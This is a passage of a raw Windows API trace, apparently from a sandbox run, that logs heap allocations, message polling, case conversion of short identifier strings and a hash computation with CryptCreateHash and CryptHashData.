0x24aa8c0 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.020] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0166.020] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.020] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0166.020] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.020] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0166.020] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0166.020] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.021] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0166.021] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.021] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.021] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.021] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.021] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0166.021] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.022] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0166.022] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.022] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0166.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0166.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.022] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.023] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.023] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0166.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0166.024] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.024] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.024] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.024] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.024] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.025] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0166.025] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.025] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0166.025] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.025] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0166.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.026] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0166.026] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0166.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0166.026] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.027] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0166.027] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.027] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0166.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0166.028] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0166.028] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0166.028] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.028] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.029] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.029] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.029] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.029] CryptHashData (hHash=0xaa56a0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0166.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0166.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0166.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0166.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0166.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0166.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0166.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0166.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0166.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0166.031] RtlAllocateHeap (HeapHandle=0x25c0000, 